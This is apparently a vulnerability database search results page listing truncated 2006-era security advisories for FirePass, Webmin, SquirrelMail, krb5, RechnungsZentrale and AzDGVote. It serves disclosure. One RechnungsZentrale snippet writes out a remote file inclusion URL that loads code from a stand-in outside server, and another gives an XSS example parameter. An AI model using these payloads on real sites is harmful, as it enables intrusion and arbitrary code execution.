8261 matches found
SOL6592 - Cross-Site Scripting vulnerability in the logon page
A cross-site scripting (XSS) vulnerability exists in the FirePass logon page. The affected FirePass logout URL fails to fully sanitize URL input before the web page content is sent to the browser. It is possible for an attacker to create web pages or emails with URLs that include executable code or...
JVN#99776858 Multiple vulnerabilities in Webmin and Usermin
Impact: A remote attacker could do the following: steal Webmin and Usermin's configuration information; execute an arbitrary script on the user's web browser; possibly conduct a session hijack attack if session information from a cookie is leaked. Solution Products Affected: Webmin 1.290 and...
SquirrelMail 1.4.8 released - fixes variable overwriting attack
Hello all, Today SquirrelMail version 1.4.8 has been released with a collection of bugfixes and an important security fix. It was possible for an authenticated user to overwrite random variables in the compose.php script. This may open up possible attack vectors like reading or overwriting a user...
MIT Kerberos (krb5) krshd and v4rcp do not properly validate setuid() or seteuid() calls
Overview: Privilege escalation vulnerabilities in MIT krb5 krshd and v4rcp may allow an authenticated attacker to execute arbitrary code. Description: The MIT krb5 krshd and v4rcp programs contain multiple privilege escalation vulnerabilities. MIT krb5 Security Advisory 2006-001 states that the...
DSA-1141-1 gnupg2 - integer overflow
Bulletin has no description...
JavaScript code can cause browser attacks - vulnerability warning - the black bar safety net
Security researchers have found a method that uses JavaScript to scan home and enterprise networks and to attack network servers, routers, printers and other equipment. The researchers say the malicious JavaScript code can be embedded in a Web page, use the browser to browse t...
CVE-2006-3521
The CVE describes multiple cross-site scripting (XSS) vulnerabilities in SiteForge Collaborative Development Platform, specifically in index/siteforge-bugs-action/proj.siteforge, affecting version 1.0.4 and earlier. The issue arises from unescaped user-controlled input via the parameters _status,...
SOL5725 - pam_ldap password policy control vulnerability CAN-2005-2641
The pam_ldap authentication module may allow clients to authenticate with lower security ciphers than are normally required when the clients have been referred from another LDAP server. F5 Product Development tracked this issue as CR54024 and it was fixed in BIG-IP LTM 9.1.3 for the 9.1 software...
DSA-1094-1 gforge - missing input sanitising
Bulletin has no description...
XSS on LarkinWEB & Company
XSS Vulnerability On LarkinWEB Database Development, Web Site Design Marketing and Advertising System. Running HTML Codes, JScript etc... XSS Vulnerability URL : http://www.larkinweb.com/secure/error.asp?msg=XSS Example:...
ASP database plug horse small conference - vulnerability warning - the black bar safety net
With the development of technology, the ASP database plug horse is no longer anything new; I believe you have played with this. But have you ever met the case where the inserted ASP code is separated by spaces, i.e. there is a space inserted between each of the characters? Now, let us solve this problem...
W32Dasm buffer overflow vulnerability analysis and exploit - vulnerability warning - the black bar safety net
Readers who have seen the Black anti “hack columnist” will all know this classic sentence: decompile the program to be cracked with W32Dasm, then select the menu “references” - “string reference”, and find “invalid registration code, please re-input!” or “registration code is...
Fenice OMS 1.10 (long get request) Remote Buffer Overflow Exploit
No description provided by source. / IHS Iran Homeland Security public source code Fenice - Open Media Streaming Server remote BOF exploit author : c0d3r "kaveh razavi" [email protected] package : fenice-1.10.tar.gz and prolly prior versions workaround : update after patch release advisory :...
RechnungsZentrale V2 <= 1.1.3 Remote Inclusion Vulnerability
Exploit for unknown platform in category web applications. RechnungsZentrale V2 <= 1.1.3 Remote Inclusion Vulnerability - GroundZero Security Research and Software Development...
RechnungsZentrale V2 < 1.1.3 - Remote File Inclusion
GroundZero Security Research and Software Development 2006 - Software: RechnungsZentrale V2 Version: 1.1.3, likely older versions are affected as well. Vendor: http://www.nfec.de/ Remote Inclusion: http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4 SQL Injection: User: '...
RechnungsZentrale V2 <= 1.1.3 Remote Inclusion Vulnerability
No description provided by source. - GroundZero Security Research and Software Development 2006 - Software: RechnungsZentrale V2 Version: 1.1.3, likely older versions are affected as well. Vendor: http://www.nfec.de/ Remote Inclusion:...
RechnungsZentrale V2 1.1.3 - Remote File Inclusion
RechnungsZentrale V2 1.1.3 - Remote File Inclusion - GroundZero Security Research and Software Development 2006 - Software: RechnungsZentrale V2 Version: 1.1.3, likely older versions are affected as well. Vendor: http://www.nfec.de/ Remote Inclusion:...
[Full-disclosure] RechnungsZentrale V2 - SQL injection and Remote PHP inclusion vulnerabilities
The Advisory can be found here: http://www.g-0.org/code/rz2-adv.html Regards, GroundZero Security Research and Software Development http://www.groundzero-security.com We object to the use or transmission of our data for advertising purposes or for market or opinion research § 28 Abs....
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in Azerbaijan Design & Development Group (AZDG) AzDGVote allow remote attackers to execute arbitrary PHP code via a URL in the intpath parameter in (1) vote.php, (2) view.php, (3) admin.php, and (4) admin/index.php...
CVE-2006-1770
Multiple PHP remote file inclusion vulnerabilities in Azerbaijan Design & Development Group (AZDG) AzDGVote allow remote attackers to execute arbitrary PHP code via a URL in the intpath parameter in (1) vote.php, (2) view.php, (3) admin.php, and (4) admin/index.php...